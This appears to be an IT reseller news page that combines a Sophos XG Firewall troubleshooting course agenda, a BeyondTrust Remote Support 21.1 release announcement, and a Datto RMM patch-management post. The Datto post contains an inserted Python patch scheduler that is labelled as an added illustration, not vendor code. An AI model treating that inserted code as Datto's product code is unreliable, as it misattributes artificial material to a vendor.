  • Have completed and passed the XG Firewall Certified Engineer course and any subsequent delta modules up to version 18.0
  • We recommend students have the following knowledge and experience:
  • Experience with Windows networking and the ability to troubleshoot issues
  • A good understanding of IT security
  • Experience configuring network security devices
  • Experience configuring and administering Linux/UNIX systems

If you are uncertain whether you meet the necessary prerequisites to take this course, please email us at globaltraining@sophos.com and we will be happy to help.

Certification

To become a Sophos Certified Technician, trainees must take and pass an online assessment. The assessment tests their knowledge of both the presented and practical content. The pass mark for the assessment is 80% and is limited to 3 attempts.

Lab Environment

Each student will be provided with a pre-configured environment that simulates a company network with two sites, a head office and a branch office, and contains Windows Servers, a Windows Desktop and three XG Firewalls.

Content

  • Module 1: Getting Started with Troubleshooting XG Firewall
  • Module 2: Troubleshooting Network Protection
  • Module 3: Troubleshooting Network Protection II
  • Module 4: Troubleshooting Authentication
  • Module 5: Troubleshooting Web Protection and Application Control
  • Module 6: Troubleshooting Synchronized Security
  • Module 7: Troubleshooting Web Server Protection
  • Module 8: Troubleshooting Wireless Protection
  • Module 9: Troubleshooting Email Protection
  • Module 10: Troubleshooting Reporting and How to Get Help

Certification

+ exam: Sophos XG Technician

Duration 2 days 

Agenda

Trainer: Michael Eleftheroglou

Day 1, Tuesday 23 February 2021

9:30-11:25 Module 1: Getting Started with Troubleshooting XG Firewall

  • Apply the troubleshooting process to issues
  • Resolve common device access issues
  • Identify the cause of XG Firewall going into failsafe mode
  • Troubleshoot and resolve common high availability issues
  • Troubleshoot routing issues
  • Labs   

11:25-11:40 break 

11:40-13:40 Module 2: Troubleshooting Network Protection

  • Troubleshoot and resolve common configuration issues with firewall rules and NAT rules
  • Manage TLS decryption errors
  • Determine whether traffic is flowing through the FastPath
  • Troubleshoot problems with IPS settings
  • Manage ATP alerts
  • Labs (40 mins)
  • Cannot Access Server in New York from London (Scenario 2)
  • DNAT Not Working (Scenario 1)
  • DNAT Not Working (Scenario 2)
  • Remote Desktop Not Working

13:40-14:15 Lunch

14:15-16:00  Module 3: Troubleshooting Network Protection II

  • Troubleshoot and resolve common connection issues for IPsec site-to-site VPNs
  • Identify and resolve common SSL VPN issues
  • Locate the logs for Sophos Connect and modify the configuration file
  • Troubleshoot and resolve common issues for Remote Ethernet Devices (RED)
  • Labs (30 mins)
  • IPsec VPN Could Not Be Established (Scenario 1)
  • IPsec VPN Could Not Be Established (Scenario 2)
  • SSL VPN Could Not Be Established

16:00-16:15 Break  

16:15-17:45  Module 4: Troubleshooting Authentication

  • Troubleshoot issues with the captive portal
  • Identify and resolve authentication issues
  • Work through the authentication flow to troubleshoot and resolve issues
  • Resolve issues with tokens being out of sync
  • Labs (20 mins)
  • User Cannot Authenticate
  • User Not Authenticated with STAS

Day 2,  Wednesday 24 February 2021

9:30-11:00 Module 5: Troubleshooting Web Protection and Application Control

  • Explain the differences between DPI web scanning and the web proxy, and troubleshoot basic web policy issues
  • Enable debug logging for DPI web scanning
  • Troubleshoot web proxy performance issues
  • Troubleshoot web categorization
  • Troubleshoot application control policy issues
  • Labs (20 mins)
  • Site Incorrectly Blocked for User
  • Application Not Working for User

11:00-11:15 Break

11:15-12:45 Module 6: Troubleshooting Synchronized Security

  • Identify and resolve issues registering XG Firewall with Sophos Central
  • Troubleshoot and resolve issues with Security Heartbeat
  • Resolve problems with Synchronized User Identity
  • Investigate and resolve problems related to lateral movement protection
  • Labs (20 mins)
  • Cannot Register XG Firewall with Sophos Central
  • Endpoint Cannot Establish a Heartbeat with XG Firewall

12:45-13:30 Break and Lunch

13:30-14:40 Module 7: Troubleshooting Web Server Protection

  • Perform basic web server protection configuration
  • Troubleshoot and resolve static URL hardening errors
  • Troubleshoot and resolve static form hardening errors
  • Troubleshoot and resolve threat filter rule errors
  • Identify whether web server authentication issues are caused by the XG Firewall or the web server
  • Labs (10 mins)
  • Error Using Webmail Server

14:40-15:35 Module 8: Troubleshooting Wireless Protection

  • Troubleshoot the access point deployment process
  • Resolve common wireless network issues
  • Identify common causes of performance issues and the configuration that can help resolve them
  • List the ports used by wireless protection and how to connect to the access point to gather additional information

15:35-15:50 Break 

15:50-17:20 Module 9: Troubleshooting Email Protection

  • Identify and resolve basic mail flow problems
  • Troubleshoot virus emails that are not detected
  • Troubleshoot false positive and false negative spam detections
  • Identify the cause of, and resolve, missing quarantine digest issues
  • Labs (30 mins)
  • Cannot Receive Email
  • Cannot Send Email
  • Virus Email Delivered

17:20-18:00 Module 10: Troubleshooting Reporting and How to Get Help

  • Troubleshoot issues with report generation
  • Find help when you are unable to resolve issues yourself

26

Jan

The IT service desk department is tasked with troubleshooting a wide range of technical issues, such as malfunctioning devices, apps that crash, and installations that fail, to name just a few.

Onsite visits, one of the traditional IT troubleshooting methods for devices (offline or online), are no longer an option for many organizations due to the pandemic. Of course, onsite visits had their problems even before the coronavirus—they could be both time-consuming and costly for an organization. The productivity of your IT department is only as good as the resources it has to use each day and its ability to support multiple platforms and devices—on or off your network.

With all that said, BeyondTrust is pleased to announce the availability of version 21.1 of our leading Remote Support solution. This new version introduces functionalities that allow unattended and attended support for additional devices, including for Zebra devices and Raspberry Pi OS, as well as Jump Client-based discovery for Windows devices. These capabilities allow users to maintain, control, and manage their devices using the power of digital technology and computing. The BeyondTrust solution enables service desk teams to gain visibility into the status and performance of these devices with real-time insights about the health of the equipment, and to remotely fix issues as if they had the device in their hands.

In this release customers will also benefit from additional enhancements to our credentials Vault, including the ability to create personal accounts, as well as extending discovery and rotation in the Vault.

Below is a brief round-up of what is new with the release of version 21.1. For more information, you can also check out the release notes.

Jump Client Discovery & Rotation

Jump Clients can now perform discovery and rotation of local credentials (Windows only). This new functionality allows administrators to manage machines individually and set who has access to those machines, without the need to set up a local or shared account on the remote system. This feature complements the use of Jump Points in the network for domain-based rotation, while also allowing for more granular control over smaller groups of machines.

Raspberry Pi OS Support

BeyondTrust’s Secure Remote Access Jump Client Technology has added headless support for the Raspberry Pi OS. Thanks to its low power requirements and high processing capabilities, Raspberry Pi is often leveraged for specialized use cases, such as for equipment or machine monitoring of industrial applications, or even as an edge gateway solution. However, these devices need to be secured, maintained, and optimized, just like any other device.

BeyondTrust Remote Support enables secure access to Raspberry Pi devices. This allows privileged users to connect to more types of unattended systems, perform administrative actions, and control who has access to manage these devices.

Zebra Device Support

Zebra devices are constantly on the move, or situated in remote locations, but are critical to empowering employee productivity. The process of supporting these devices, ensuring proper configuration and effectiveness, has traditionally been time-consuming for help desks, as well as expensive and error-prone. BeyondTrust’s integration with Zebra Technologies gives IT service desk reps the power to access (either attended or unattended), troubleshoot, and support Zebra devices to help minimize any potential downtime.

BeyondTrust Vault

Included with Remote Support at no additional cost, the BeyondTrust Vault protects privileged credentials with discovery, management, rotation, auditing, and monitoring for any privileged account — from local or domain shared administrator, to a user’s personal admin account, even SSH keys, cloud and social media accounts.

Vault Link in Representative Console

The Desktop and Web Representative Consoles now include a top-level menu item labeled “Vault”, which has a link to the Vault interface in /login. This link enables users in each console to easily access Vault to check in or check out credentials when necessary, either during a session or on the user’s local machine.

Account Groups

Vault administrators can now organize Vault accounts into account groups, providing a better management experience. Admins can now assign account groups to group policies, rather than only individual Vault accounts. Additionally, Vault accounts can be assigned to an account group during the import process.

Personal Accounts

Remote Support users now have the ability to create private generic accounts in Vault. This functionality helps improve the productivity of users by allowing them to manage their own Vault accounts privately for use during remote sessions, or for quick access to other tools. Users can store Generic Credentials that are not managed, rotated, or visible to anyone else but themselves. These credentials are then useable for injection or check out by that user only.

Reporting

Vault reporting now provides more search options and the ability to directly download the report results. The reporting API has been updated to support this new functionality.

Assign Public Portals to Support Teams

BeyondTrust Remote Support allows you to create internal or external-facing web portals, or public-facing web sites. These portals allow your customers or employees to request support. Each portal can be configured with the organization’s branding and support processes. This includes customizing logos and allowing customers to start a BeyondTrust session using click-to-chat.

In this release, admins can now restrict what portals are used by a support team. This new functionality will create more granular control on how a team interacts with the sites.

Extended APDU Smart Card Support Option

During a support session, a support representative may need to operate with administrative rights to effectively troubleshoot the remote computer. Within environments where security implementations require smart card use for authentication, BeyondTrust enables the support representative to pass administrative credentials to the remote computer from a smart card resident on the rep’s local system.

In this release, we have updated the Virtual Smart Card feature to support Extended APDU.

Taking Your Service Desk to the Next Level with BeyondTrust Remote Support

BeyondTrust Remote Support enables help desk teams to rapidly and securely access and troubleshoot any remote device, across any platform, located anywhere in the world—all via a single solution. The new features in version 20.1 expand what’s already possible with our solution, helping you empower, protect, and scale your service desk.

If you are already a customer, here’s how to get started with version 21.1: https://www.beyondtrust.com/docs/remote-support/getting-started/deployment/web/support-updates.htm

Source: BeyondTrust

22 Jan

Software is never done. Developers—from the biggest to the smallest—release regular updates to increase security, add new features, improve stability, and satisfy compliance mandates. These updates are typically referred to as “patches.”

Many managed service providers (MSPs) recognize patch management as one of the cornerstone capabilities of their service offerings. Maintaining patch management best practices ensures that software bugs or weaknesses are addressed to ensure a secure and optimally efficient computing environment.

As MSPs grow their business, the number of networks they must track grows in step, and the number of client software solutions requiring patch management can expand exponentially. Tracking which platforms each individual client runs, and then manually pushing updates to each one, creates time-intensive levels of extra complexity.

Datto RMM brings order to this critical process with automated patch management. Datto RMM is a fully-featured, secure, cloud-based remote monitoring and management platform which enables MSPs to remotely monitor, manage, and support every endpoint under contract, reducing cost and increasing service delivery efficiency.

With the automated patch management features of Datto RMM, MSPs can schedule updates to unfold at an optimum pace. Setting a timeline is important for security, because patch management isn’t simply a case of installing patches the moment they’re available from a vendor. Applying patches too often is not only time consuming but can lead to system instability. Even worse, patches themselves can turn out to have flaws; patch management best practices typically call for a grace period before installation in case a new bug is discovered.
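The grace-period practice described above, as an added example that is not Datto's or Datto RMM's code: a small scheduler that holds each patch for a configurable number of days after release, drops any patch flagged with a known issue during that window, and then places it in the next maintenance window. The seven-day grace period, the Saturday window, the `known_issue` flag and the `KB-A` to `KB-D` patch records are all constructed assumptions for the illustration; in practice the flag would be fed from vendor advisories and your own test ring.

```python
"""Grace-period patch scheduler (added example, not Datto RMM code)."""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Iterable, List, Tuple

SATURDAY = 5  # date.weekday(): Monday == 0 ... Sunday == 6


@dataclass(frozen=True)
class Patch:
    """One vendor update as the scheduler sees it (constructed model)."""
    patch_id: str
    released: date
    # Set when the vendor withdraws the patch or a regression is reported
    # during the grace period; such a patch is never scheduled.
    known_issue: bool = False


# Constructed sample data; ids and dates are illustrative only.
SAMPLE_PATCHES = [
    Patch("KB-A", date(2021, 1, 4)),                     # released on a Monday
    Patch("KB-B", date(2021, 1, 9)),                     # released on a Saturday
    Patch("KB-C", date(2021, 1, 10)),                    # released on a Sunday
    Patch("KB-D", date(2021, 1, 4), known_issue=True),   # flagged: must be held back
]


def earliest_install(patch: Patch, grace_days: int) -> date:
    """First day the patch may be installed: release date plus grace period."""
    return patch.released + timedelta(days=grace_days)


def next_window(earliest: date, window_weekday: int = SATURDAY) -> date:
    """Next maintenance-window day on or after `earliest` (same day if it qualifies)."""
    days_ahead = (window_weekday - earliest.weekday()) % 7
    return earliest + timedelta(days=days_ahead)


def schedule(patches: Iterable[Patch], grace_days: int = 7,
             window_weekday: int = SATURDAY) -> List[Tuple[str, date]]:
    """Return (patch_id, install_date) pairs, earliest first, for patches
    without known issues, each placed in the first window after its grace period."""
    plan = []
    for p in patches:
        if p.known_issue:
            continue  # grace period did its job: never push a flawed patch
        when = next_window(earliest_install(p, grace_days), window_weekday)
        plan.append((p.patch_id, when))
    return sorted(plan, key=lambda item: item[1])


def due_today(patches: Iterable[Patch], today: date, grace_days: int = 7,
              window_weekday: int = SATURDAY) -> List[str]:
    """Patch ids whose scheduled date is `today` (what an agent would push now)."""
    return [pid for pid, when in schedule(patches, grace_days, window_weekday)
            if when == today]


if __name__ == "__main__":
    for pid, when in schedule(SAMPLE_PATCHES):
        print(f"{pid}: install on {when.isoformat()}")
    print("due on 2021-01-16:", due_today(SAMPLE_PATCHES, date(2021, 1, 16)))
```

Note that the grace period is counted from the vendor release date, not from the day the patch was noticed, so a patch discovered late is not held for an extra week; and a patch released on the window day itself still waits a full grace period before it is eligible for the following window.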

Building Cyber Resilience

Cyber resilience, a concept that converges information security, business continuity, and organizational resilience, represents a business’s ability to continuously deliver on its intended outcome, despite adverse cyber events.

“Cyber resilience is the ultimate objective of building an information security program for any business of any size,” says Ryan Weeks, Chief Information Security Officer for Datto. “It’s intended to ensure the availability, integrity, and confidentiality of systems and data through an adverse event.”

According to Weeks, cyber resilience is built on three pillars: people, processes, and technology. One of the keys to reinforcing the process component of a security program is using technology to automate processes across systems at scale, where it makes sense to do so.

“Technology supports your people and processes to scale once they’re ready,” he explains. “Technology should also support those people and those processes in terms of automation. For a lot of your security processes—especially if you don’t want to hire a huge security team—you’re going to need to rely a lot on automation. Before you go out and start purchasing more technology, you need to look at your existing technology and how you can leverage that to increase your overall effectiveness.”

Activate Automation with Datto RMM

Datto RMM enables MSPs to increase their clients’ cyber resilience. Using Datto RMM, patch updates can be tightly scheduled, which allows MSPs to track exactly when a patch has been installed. With that heightened level of control, MSPs can ensure that patches are only installed after any accompanying bugs have been worked out.

Datto RMM can also be integrated with Datto SIRIS, a reliable, all-in-one business continuity and disaster recovery (BCDR) solution built for MSPs to prevent data loss and minimize downtime for clients. With SIRIS in the mix, system instability that may have accompanied a new patch installation can be fixed quickly by restoring to a previous system version.

MSPs that have automated patch management in their toolkit can win back precious time, a valuable ally in the race to keep pace with a fast-changing landscape. “It doesn’t matter where you are in the Cyber Resilience spectrum—it’s a continuous improvement process,” Weeks concludes. “There will always be more work to do, because things are constantly changing and you need to adapt with that change.”

To learn more about automated patch management and increasing cyber resilience with Datto RMM, schedule a demo.

Source: Datto